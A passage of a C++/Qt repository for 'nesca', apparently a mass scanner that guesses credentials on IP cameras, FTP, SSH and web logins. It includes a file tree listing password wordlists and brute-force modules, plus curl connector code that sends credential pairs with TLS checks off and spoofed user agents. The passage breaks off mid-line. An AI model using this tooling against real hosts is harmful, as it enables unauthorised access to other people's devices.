├── .gitignore ├── 1.jpg ├── ActivityDrawerTh_HorNet.cpp ├── ActivityDrawerTh_HorNet.h ├── BasicAuth.cpp ├── BasicAuth.h ├── BruteUtils.cpp ├── BruteUtils.h ├── CheckKey_Th.cpp ├── CheckKey_Th.h ├── Connector.cpp ├── Connector.h ├── Dockerfile ├── DrawerTh_GridQoSScanner.cpp ├── DrawerTh_GridQoSScanner.h ├── DrawerTh_HorNet.cpp ├── DrawerTh_HorNet.h ├── DrawerTh_ME2Scanner.cpp ├── DrawerTh_ME2Scanner.h ├── DrawerTh_QoSScanner.cpp ├── DrawerTh_QoSScanner.h ├── DrawerTh_VoiceScanner.cpp ├── DrawerTh_VoiceScanner.h ├── Eurostile.ttf ├── FTPAuth.cpp ├── FTPAuth.h ├── FileDownloader.cpp ├── FileDownloader.h ├── FileUpdater.cpp ├── FileUpdater.h ├── HCNetSDK.lib ├── HikvisionLogin.cpp ├── HikvisionLogin.h ├── IPCAuth.cpp ├── IPCAuth.h ├── IPRandomizer.cpp ├── IPRandomizer.h ├── MainStarter.cpp ├── MainStarter.h ├── PropertySheet.props ├── PropertySheet1.props ├── README.md ├── RTSP.cpp ├── RTSP.h ├── SSHAuth.cpp ├── SSHAuth.h ├── STh.cpp ├── STh.h ├── Threader.cpp ├── Threader.h ├── Utils.cpp ├── Utils.h ├── WebformWorker.cpp ├── WebformWorker.h ├── base64.cpp ├── base64.h ├── debugData.txt ├── examples └── old_nesca.png ├── externData.h ├── externFunctions.h ├── finder.cpp ├── finland.txt ├── ftplogin.txt ├── ftppass.txt ├── login.txt ├── main.cpp ├── mainResources.h ├── msgcheckerthread.cpp ├── msgcheckerthread.h ├── negatives.txt ├── nesca.ico ├── nesca.pro ├── nesca.pro.user ├── nesca_3.cpp ├── nesca_3.h ├── nesca_3.pro ├── nesca_3.qrc ├── nesca_3.rc ├── nesca_3.ruleset ├── nesca_3.ui ├── pass.txt ├── piestat.cpp ├── piestat.h ├── progressbardrawer.cpp ├── progressbardrawer.h ├── pwd_lists ├── ftplogin.txt ├── ftppass.txt ├── login.txt ├── negatives.txt ├── pass.txt ├── sshpass.txt ├── wflogin.txt └── wfpass.txt ├── resource.h ├── small_font.ttf ├── sshpass.txt ├── vercheckerthread.cpp ├── vercheckerthread.h ├── version ├── wflogin.txt └── wfpass.txt /.gitignore: -------------------------------------------------------------------------------- 1 | *.pro.user 2 | *.swo 3 | *.swp 4 | debugData.txt 5 | *.png 6 | adns_dll.dll 7 | changelog 8 | *.obj 9 | *.res 10 | *.log 11 | *.tlog 12 | *.lastbuildstate 13 | *.pdb 14 | GeneratedFiles/* 15 | imp.txt 16 | imp2.txt 17 | *.dll 18 | logs/* 19 | *.vcxproj.* 20 | *.vcxproj 21 | *.aps 22 | *.svg 23 | Release/* 24 | Debug/* 25 | restore 26 | result_files/* 27 | *.bmp 28 | *.bk 29 | 30 | tags.txt 31 | lisca.cpp 32 | main - копия.cpp 33 | result_files-* 34 | *.BACKUP.* 35 | *.LOCAL.* 36 | *.REMOTE.* 37 | *.BASE.* 38 | *.o 39 | nesca 40 | moc_* 41 | *~ 42 | *.user 43 | Makefile 44 | tmp/* 45 | qrc_nesca_3.cpp 46 | -------------------------------------------------------------------------------- /1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/1.jpg -------------------------------------------------------------------------------- /ActivityDrawerTh_HorNet.cpp: -------------------------------------------------------------------------------- 1 | #include "ActivityDrawerTh_HorNet.h" 2 | #include "externData.h" 3 | 4 | void ActivityDrawerTh_HorNet::doEmitDrawActivityLine(QString data) 5 | { 6 | emit adtHN->sDrawActivityLine(data); 7 | } 8 | 9 | void ActivityDrawerTh_HorNet::doEmitDrawGrid() 10 | { 11 | emit adtHN->sDrawGrid(); 12 | } 13 | 14 | void makeActLine(int val) 15 | { 16 | if(actLst.size() < 50) actLst.push_back(val); 17 | else 18 | { 19 | actLst.pop_front(); 20 | actLst.push_back(val); 21 | }; 22 | } 23 | 24 | void ActivityDrawerTh_HorNet::run() 25 | { 26 | adtHN->doEmitDrawGrid(); 27 | int maxAct = Activity + 1; 28 | int nm = 0; 29 | while (true) 30 | { 31 | if (maxAct < Activity) maxAct = Activity; 32 | if (maxAct > 1000) nm = maxAct -= 1000; 33 | else if (maxAct > 10) nm = maxAct -= 10; 34 | 35 | makeActLine(((float)Activity / (nm != 0 ? nm : 1)) * 10); 36 | adtHN->doEmitDrawActivityLine(QString::number(Activity) + "b"); 37 | Activity = 0; 38 | msleep(200); 39 | }; 40 | } 41 | -------------------------------------------------------------------------------- /ActivityDrawerTh_HorNet.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef ACTIVITYDRAWERTH_HORNET_H 3 | #define ACTIVITYDRAWERTH_HORNET_H 4 | 5 | #include "STh.h" 6 | 7 | class ActivityDrawerTh_HorNet : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: signals: void sDrawActivityLine(QString); 12 | public: signals: void sDrawGrid(); 13 | 14 | public: 15 | static void doEmitDrawActivityLine(QString data); 16 | static void doEmitDrawGrid(); 17 | protected: 18 | void run(); 19 | }; 20 | extern ActivityDrawerTh_HorNet *adtHN; 21 | #endif // ACTIVITYDRAWERTH_HORNET_H 22 | -------------------------------------------------------------------------------- /BasicAuth.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/BasicAuth.cpp -------------------------------------------------------------------------------- /BasicAuth.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef BASICAUTH_H 3 | #define BASICAUTH_H 4 | 5 | #include "Utils.h" 6 | #include "Connector.h" 7 | #include "externData.h" 8 | #include "mainResources.h" 9 | 10 | class BA { 11 | private: 12 | static lopaStr BABrute(const char *ip, const int port, bool performDoubleCheck); 13 | 14 | public: 15 | static int checkOutput(const string *buffer, const char *ip, const int port); 16 | static lopaStr BALobby(const char *ip, const int port, bool performDoubleCheck); 17 | }; 18 | 19 | #endif // BASICAUTH_H 20 | -------------------------------------------------------------------------------- /BruteUtils.cpp: -------------------------------------------------------------------------------- 1 | #include "BruteUtils.h" 2 | #include "STh.h" 3 | #include "externData.h" 4 | 5 | void BruteUtils::BConInc() 6 | { 7 | // ++BA; 8 | //#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 9 | //__asm 10 | // { 11 | // lock inc BrutingThrds; 12 | // }; 13 | //#else 14 | // asm("lock incl BrutingThrds"); 15 | //#endif 16 | // stt->doEmitionUpdateArc(gTargets); 17 | } 18 | 19 | void BruteUtils::BConDec() 20 | { 21 | // if(BrutingThrds > 0) 22 | // { 23 | //#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 24 | // __asm 25 | // { 26 | // lock dec BrutingThrds; 27 | // }; 28 | //#else 29 | // asm("lock decl BrutingThrds"); 30 | //#endif 31 | // } 32 | // stt->doEmitionUpdateArc(gTargets); 33 | } 34 | -------------------------------------------------------------------------------- /BruteUtils.h: -------------------------------------------------------------------------------- 1 | #ifndef BRUTEUTILS_H 2 | #define BRUTEUTILS_H 3 | 4 | #include "externData.h" 5 | 6 | class BruteUtils { 7 | 8 | public: 9 | static void BConInc(); 10 | static void BConDec(); 11 | }; 12 | 13 | #endif // BRUTEUTILS_H 14 | -------------------------------------------------------------------------------- /CheckKey_Th.cpp: -------------------------------------------------------------------------------- 1 | #include "CheckKey_Th.h" 2 | #include "STh.h" 3 | #include "externData.h" 4 | #include "externFunctions.h" 5 | #include "Connector.h" 6 | #include "Utils.h" 7 | 8 | int CheckKey_Th::isActiveKey = -1; 9 | 10 | void getSubStrEx(const char *src, char *startStr, char *endStr, char *dest, int szDest) 11 | { 12 | //ZeroMemory(dest, szDest); 13 | dest[0] = 0; 14 | char *ptr1 = strstri((const char*)src, startStr); 15 | if(ptr1 != NULL) 16 | { 17 | char *ptr2 = strstri((const char*)ptr1, endStr); 18 | if(ptr2 != NULL) 19 | { 20 | int szStartStr = strlen(startStr); 21 | int sz = ptr2 - ptr1 - szStartStr; 22 | strncpy(dest, ptr1 + szStartStr, sz < szDest ? sz : szDest); 23 | }; 24 | }; 25 | } 26 | void getSubStr(char *src, char *startStr, char *endStr, char *dest, int szDest) 27 | { 28 | //ZeroMemory(dest, szDest); 29 | dest[0] = 0; 30 | char *ptr1 = strstri((const char*)src, startStr); 31 | if(ptr1 != NULL) 32 | { 33 | char *ptr2 = strstri((const char*)ptr1, endStr); 34 | if(ptr2 != NULL) 35 | { 36 | int sz = ptr2 - ptr1; 37 | strncpy(dest, ptr1, sz < szDest ? sz : szDest); 38 | }; 39 | }; 40 | } 41 | 42 | int emitIfOK = -1; 43 | int KeyCheckerMain() 44 | { 45 | int kLen = strlen(trcPersKey); 46 | if(kLen == 0) 47 | { 48 | stt->doEmitionRedFoundData("[Key check] Key field is empty."); 49 | return -1; 50 | } 51 | else if(kLen < 32) 52 | { 53 | stt->doEmitionRedFoundData("[Key check] Key length is not valid."); 54 | return -1; 55 | }; 56 | 57 | std::vector headerVector; 58 | headerVector.push_back("X-Nescav3: True"); 59 | 60 | std::string buffer; 61 | Connector con; 62 | con.nConnect((std::string(trcSrv) + std::string(trcScr)).c_str(), std::atoi(trcSrvPortLine), &buffer, NULL, &headerVector); 63 | 64 | int hostStringIndex = buffer.find("\r\n\r\n"); 65 | if(hostStringIndex != -1) { 66 | 67 | int s = buffer.find("http://", hostStringIndex); 68 | int e = buffer.find('/', s + 8); 69 | std::string url = buffer.substr(s, e - s); 70 | Connector con; 71 | con.nConnect((url + std::string("/api/checkaccount?key=") + std::string(trcPersKey)).c_str(), 72 | std::atoi(trcSrvPortLine), &buffer, NULL, &headerVector); 73 | 74 | if(Utils::ustrstr(buffer, std::string("202 Accepted")) != -1) { 75 | stt->doEmitionGreenFoundData("Key is valid."); 76 | CheckKey_Th::isActiveKey = 1; 77 | if(emitIfOK == 0) stt->doEmitionStartScanIP(); 78 | else if(emitIfOK == 1) stt->doEmitionStartScanDNS(); 79 | else if(emitIfOK == 2) stt->doEmitionStartScanImport(); 80 | return 1; 81 | } else if(Utils::ustrstr(buffer, std::string("400 Bad Request")) != -1) { 82 | QString errorDef = Utils::GetNSErrorDefinition(buffer.c_str(), "notify"); 83 | if(errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] Key is unauthorized. A valid key is required."); 84 | else stt->doEmitionYellowFoundData("[Key check] FAIL! [400 Bad Request : " + 85 | Utils::GetNSErrorDefinition(buffer.c_str(), "notify") + "]"); 86 | } else if(Utils::ustrstr(buffer, std::string("503 Bad Gateway")) != -1) { 87 | stt->doEmitionYellowFoundData("[Key check] 503 Backend not responding!"); 88 | } else { 89 | char header[64] = {0}; 90 | getSubStrEx(buffer.c_str(), (char *) "http/1.1 ", (char *) "\r\n", header, 64); 91 | stt->doEmitionRedFoundData("[Key check] FAIL! An error occured. (" + QString::number(WSAGetLastError()) + ") Header: " + QString::fromLocal8Bit(header) + ""); 92 | if(gDebugMode) stt->doEmitionDebugFoundData(QString(buffer.c_str())); 93 | }; 94 | } else { 95 | stt->doEmitionRedFoundData("[Key check] Cannot acquire host string."); 96 | } 97 | return -1; 98 | } 99 | 100 | void CheckKey_Th::run() 101 | { 102 | KeyCheckerMain(); 103 | } 104 | -------------------------------------------------------------------------------- /CheckKey_Th.h: -------------------------------------------------------------------------------- 1 | #ifndef CHECKKEY_TH_H 2 | #define CHECKKEY_TH_H 3 | 4 | #include "STh.h" 5 | 6 | extern int emitIfOK; 7 | class CheckKey_Th : public QThread 8 | { 9 | public: static int isActiveKey; 10 | Q_OBJECT 11 | 12 | protected: 13 | void run(); 14 | }; 15 | 16 | extern CheckKey_Th *chKTh; 17 | #endif // CHECKKEY_TH_H 18 | -------------------------------------------------------------------------------- /Connector.cpp: -------------------------------------------------------------------------------- 1 | #include "Connector.h" 2 | #include "SSHAuth.h" 3 | 4 | struct data { 5 | char trace_ascii; /* 1 or 0 */ 6 | }; 7 | 8 | static 9 | int my_trace(CURL *handle, curl_infotype type, 10 | char *data, size_t size, 11 | void *userp) 12 | { 13 | if (type == CURLINFO_HEADER_OUT) { 14 | //data[size] = '\0'; 15 | //Activity += strlen(data); 16 | data[size] = '\0'; 17 | QString qData = QString(data); 18 | Activity += qData.length(); 19 | stt->doEmitionAddOutData(qData); 20 | } 21 | //else if (type == CURLINFO_HEADER_IN) { 22 | // QString qData = QString(data); 23 | // Activity += qData.length(); 24 | // stt->doEmitionAddIncData("", qData); 25 | //} 26 | 27 | return 0; 28 | } 29 | 30 | size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *userp) 31 | { 32 | size_t realsize = size * nmemb; 33 | if (((std::string*)userp)->size() > 180000) return -1; 34 | ((std::string*)userp)->append((char*)contents, realsize); 35 | Activity += realsize; 36 | return realsize; 37 | 38 | //struct MemoryStruct *mem = (struct MemoryStruct *)userp; 39 | //if (mem->size > 180000) return -1; 40 | //size_t realsize = size * nmemb; 41 | //mem->memory = (char*)realloc(mem->memory, mem->size + realsize + 1); 42 | 43 | //if (mem->memory == NULL) { 44 | // stt->doEmitionRedFoundData("not enough memory (realloc returned NULL)\n"); 45 | // return 0; 46 | //} 47 | 48 | //memcpy(&(mem->memory[mem->size]), contents, realsize); 49 | //mem->size += realsize; 50 | //mem->memory[mem->size] = 0; 51 | //Activity += realsize; 52 | //return realsize; 53 | } 54 | 55 | int pConnect(const char* ip, const int port, std::string *buffer, 56 | const char *postData, 57 | const std::vector *customHeaders, 58 | const std::string *lpString, 59 | bool digestMode) 60 | { 61 | buffer->clear(); 62 | int res = 0; 63 | CURL *curl = curl_easy_init(); 64 | 65 | if (curl != NULL) 66 | { 67 | curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); 68 | if (MapWidgetOpened) { 69 | struct data config; 70 | config.trace_ascii = 1; /* enable ascii tracing */ 71 | curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); 72 | //curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); 73 | curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); 74 | } 75 | curl_easy_setopt(curl, CURLOPT_URL, ip); 76 | curl_easy_setopt(curl, CURLOPT_PORT, port); 77 | curl_easy_setopt(curl, CURLOPT_USERAGENT, 78 | "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); 79 | curl_easy_setopt(curl, CURLOPT_HEADER, 1L); 80 | curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); 81 | curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 0L); 82 | curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); 83 | curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); 84 | curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); 85 | curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); 86 | int proxyPort = std::atoi(gProxyPort); 87 | if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); 88 | curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); 89 | curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); 90 | curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); 91 | curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); 92 | curl_easy_setopt(curl, CURLOPT_COOKIEFILE, ""); 93 | 94 | if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); 95 | 96 | if (customHeaders != NULL) { 97 | 98 | struct curl_slist *chunk = NULL; 99 | for (auto &ch : *customHeaders) chunk = curl_slist_append(chunk, ch.c_str()); 100 | curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk); 101 | } 102 | 103 | if (lpString != NULL) { 104 | curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); 105 | curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); 106 | curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); 107 | if (digestMode) 108 | { 109 | curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); 110 | res = curl_easy_perform(curl); 111 | 112 | if (port != 21 && lpString != NULL) { 113 | int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); 114 | if (pos != -1) { 115 | *buffer = buffer->substr(pos + 4); 116 | } 117 | } 118 | } 119 | else res = curl_easy_perform(curl); 120 | } 121 | else res = curl_easy_perform(curl); 122 | 123 | int sz = buffer->size(); 124 | 125 | curl_easy_cleanup(curl); 126 | 127 | if (res == 35) { 128 | return -1; 129 | } else if (res == CURLE_OK || sz > 0) { 130 | return sz; 131 | } 132 | else if (res == CURLE_LOGIN_DENIED && port == 21) { 133 | return -1; 134 | } 135 | else if (res == CURLE_OPERATION_TIMEDOUT 136 | || res == CURLE_COULDNT_CONNECT 137 | || res == CURLE_SEND_ERROR 138 | || res == CURLE_RECV_ERROR 139 | ) { 140 | //if (gNegDebugMode) 141 | //{ 142 | // stt->doEmitionDebugFoundData("NConnect failed (curl_code: " + QString::number(res) + ") [" + QString(ip) + " Port:" + QString::number(port) + "]"); 144 | //} 145 | SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 146 | shutdown(eNobuffSocket, SD_BOTH); 147 | closesocket(eNobuffSocket); 148 | /*if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) { 149 | stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec..."); 150 | Sleep(10000); 151 | }*/ 152 | return -1; 153 | } 154 | else { 155 | if (res == 6) return -2; 156 | else if (res != 13 && 157 | res != 67 && 158 | res != CURLE_GOT_NOTHING && 159 | res != 56 && 160 | res != 35 && 161 | res != 19 && 162 | res != 23) 163 | { 164 | if (res == 5) { 165 | stt->doEmitionRedFoundData("The given proxy host could not be resolved."); 166 | return -2; 167 | } 168 | else if (res == 8) { 169 | return -2; 170 | } 171 | else if (res == 18) { 172 | return -2; 173 | } 174 | else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip)); 175 | }; 176 | 177 | //if (res == 23 && sz > 0) { 178 | // return sz; 179 | //} 180 | return sz; 181 | //else return -1; 182 | } 183 | 184 | return sz; 185 | } 186 | else { 187 | stt->doEmitionRedFoundData("Curl error."); 188 | return -1; 189 | }; 190 | } 191 | int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool isDigest) 192 | { 193 | buffer->clear(); 194 | int res = 0; 195 | CURL *curl = curl_easy_init(); 196 | 197 | if (curl != NULL) 198 | { 199 | curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); 200 | if (MapWidgetOpened) { 201 | struct data config; 202 | config.trace_ascii = 1; /* enable ascii tracing */ 203 | curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); 204 | curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); 205 | curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); 206 | } 207 | 208 | curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); 209 | curl_easy_setopt(curl, CURLOPT_USERAGENT, 210 | "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); 211 | curl_easy_setopt(curl, CURLOPT_URL, ip); 212 | curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); 213 | curl_easy_setopt(curl, CURLOPT_HEADER, 1L); 214 | curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); 215 | curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); 216 | int proxyPort = std::atoi(gProxyPort); 217 | if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); 218 | curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); 219 | curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); 220 | curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); 221 | if (isDigest) { 222 | curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); 223 | } 224 | else { 225 | curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC); 226 | } 227 | curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); 228 | 229 | res = curl_easy_perform(curl); 230 | 231 | int sz = buffer->size(); 232 | curl_easy_cleanup(curl); 233 | 234 | if (res == CURLE_OK || sz > 0) { 235 | return sz; 236 | } 237 | 238 | return -1; 239 | } 240 | 241 | stt->doEmitionRedFoundData("Curl error."); 242 | return -1; 243 | } 244 | 245 | void eraser(std::string *buffer, const std::string delim1, const std::string delim2) { 246 | int pos = -1; 247 | while ((pos = buffer->find(delim1)) != -1) { 248 | int ePos = buffer->find(delim2, pos); 249 | if (ePos != -1) { 250 | buffer->erase(pos, ePos - pos - 1 + delim2.length()); 251 | } 252 | else { 253 | buffer->erase(pos, buffer->length() - pos - 1); 254 | } 255 | } 256 | } 257 | void cutoutComments(std::string *buffer) { 258 | //eraser(buffer, "//", "\n"); //Cant's handle urls: http://bla.bla 259 | eraser(buffer, ""); 260 | eraser(buffer, "/*", "*/"); 261 | } 262 | 263 | int Connector::nConnect(const char* ip, const int port, std::string *buffer, 264 | const char *postData, 265 | const std::vector *customHeaders, 266 | const std::string *lpString, 267 | bool digestMode, 268 | bool isRTSP, bool isDigest){ 269 | int res = 0; 270 | 271 | if (!isRTSP) { 272 | res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode); 273 | } 274 | else { 275 | res = pConnectRTSP(ip, port, buffer, lpString, isDigest); 276 | } 277 | cutoutComments(buffer); 278 | 279 | if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); 280 | Activity += buffer->size(); 281 | 282 | return res; 283 | } 284 | 285 | int Connector::checkIsDigestRTSP(const char *ip, std::string *buffer) { 286 | 287 | buffer->clear(); 288 | int res = 0; 289 | CURL *curl = curl_easy_init(); 290 | 291 | if (curl != NULL) 292 | { 293 | curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); 294 | if (MapWidgetOpened) { 295 | struct data config; 296 | config.trace_ascii = 1; /* enable ascii tracing */ 297 | curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); 298 | curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); 299 | curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); 300 | } 301 | 302 | curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); 303 | curl_easy_setopt(curl, CURLOPT_USERAGENT, 304 | "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); 305 | curl_easy_setopt(curl, CURLOPT_URL, ip); 306 | curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); 307 | curl_easy_setopt(curl, CURLOPT_HEADER, 1L); 308 | curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); 309 | curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); 310 | int proxyPort = std::atoi(gProxyPort); 311 | if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); 312 | curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); 313 | curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); 314 | curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); 315 | 316 | res = curl_easy_perform(curl); 317 | 318 | int sz = buffer->size(); 319 | 320 | curl_easy_cleanup(curl); 321 | if (res == CURLE_OK || sz > 0) { 322 | if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); 323 | Activity += sz; 324 | 325 | if (Utils::ustrstr(buffer, "200 ok") != -1) { 326 | return 2; 327 | } 328 | else if (Utils::ustrstr(buffer, "not found") != -1) { 329 | return -1; 330 | } 331 | else if (Utils::ustrstr(buffer, "digest") != -1) { 332 | return 1; 333 | } 334 | else { 335 | return 0; 336 | } 337 | } 338 | 339 | return -1; 340 | } 341 | 342 | stt->doEmitionRedFoundData("Curl error."); 343 | return -1; 344 | } 345 | 346 | bool portCheck(const char * sDVRIP, int wDVRPort) { 347 | // sockaddr_in sa; 348 | // sa.sin_family = AF_INET; 349 | // sa.sin_port = htons(wDVRPort); 350 | // 351 | // hostent *host = NULL; 352 | //#if defined(WIN32) 353 | // if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.S_un.S_addr = inet_addr(sDVRIP); 354 | //#else 355 | // if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.s_addr = inet_addr(sDVRIP); 356 | //#endif 357 | // else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 358 | // else { 359 | // stt->doEmitionDebugFoundData("Port check failed - inet_addr failure. [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 361 | // return false; 362 | // } 363 | // 364 | // SOCKET sock = INVALID_SOCKET; 365 | // sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 366 | // if (sock == INVALID_SOCKET) return false; 367 | // else if (ENOBUFS == sock || ENOMEM == sock) { 368 | // stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec..."); 369 | // return false; 370 | // } 371 | // 372 | // int res = connect(sock, (sockaddr*)&sa, sizeof(sa)); 373 | // 374 | // //shutdown(sock, SD_BOTH); 375 | // //closesocket(sock); 376 | // int resE = WSAGetLastError(); 377 | // if (res == SOCKET_ERROR) { 378 | // if (gNegDebugMode) 379 | // { 380 | // stt->doEmitionDebugFoundData("Port check failed - SOCKET_ERROR. [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 382 | // } 383 | // return false; 384 | // } 385 | // else { 386 | // stt->doEmitionDebugFoundData("WSAGetLastError1: " + QString::number(resE) + "socket: " + QString::number(sock) + " [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 388 | // char tBuff[1] = { 0 }; 389 | // int recvCode = send(sock, tBuff, 0, 0); 390 | // resE = WSAGetLastError(); 391 | // stt->doEmitionDebugFoundData("WSAGetLastError2: " + QString::number(resE) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 393 | // if (-1 == recvCode) { 394 | // stt->doEmitionDebugFoundData("Port check failed (recv code: " + QString::number(recvCode) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 396 | // return false; 397 | // } 398 | // shutdown(sock, SD_BOTH); 399 | // closesocket(sock); 400 | // if (gNegDebugMode) 401 | // { 402 | // stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 404 | // } 405 | // return true; 406 | // } 407 | // 408 | // if (gNegDebugMode) 409 | // { 410 | // stt->doEmitionDebugFoundData("Port check failed - unknown socket error. [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 412 | // } 413 | // return false; 414 | 415 | CURL *curl = curl_easy_init(); 416 | if (curl != NULL) { 417 | curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); 418 | curl_easy_setopt(curl, CURLOPT_URL, sDVRIP); 419 | curl_easy_setopt(curl, CURLOPT_PORT, wDVRPort); 420 | int proxyPort = std::atoi(gProxyPort); 421 | if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); 422 | curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); 423 | curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); 424 | curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut); 425 | curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L); 426 | int res = curl_easy_perform(curl); 427 | curl_easy_cleanup(curl); 428 | if (res != CURLE_OK) { 429 | if (gNegDebugMode) 430 | { 431 | /*stt->doEmitionDebugFoundData("Port check failed (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]");*/ 433 | SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 434 | shutdown(eNobuffSocket, SD_BOTH); 435 | closesocket(eNobuffSocket); 436 | /*if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) { 437 | stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec..."); 438 | Sleep(10000); 439 | }*/ 440 | } 441 | return false; 442 | } 443 | else { 444 | if (gNegDebugMode) 445 | { 446 | stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + "]"); 448 | } 449 | return true; 450 | } 451 | } 452 | else { 453 | //if (gNegDebugMode) 454 | //{ 455 | // stt->doEmitionDebugFoundData("Port check failed - curl_easy_init() error. [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]"); 457 | //} 458 | return false; 459 | } 460 | } 461 | int Connector::connectToPort(char* ip, int port) 462 | { 463 | // if(gPingNScan) 464 | // { 465 | // if(_pingMyTarget(ip) == 0) return -2; 466 | // }; 467 | 468 | std::string buffer; 469 | int size = 0; 470 | char tempIp[128] = { 0 }; 471 | int sz = strlen(ip); 472 | if (443 == port) { 473 | sprintf(tempIp, 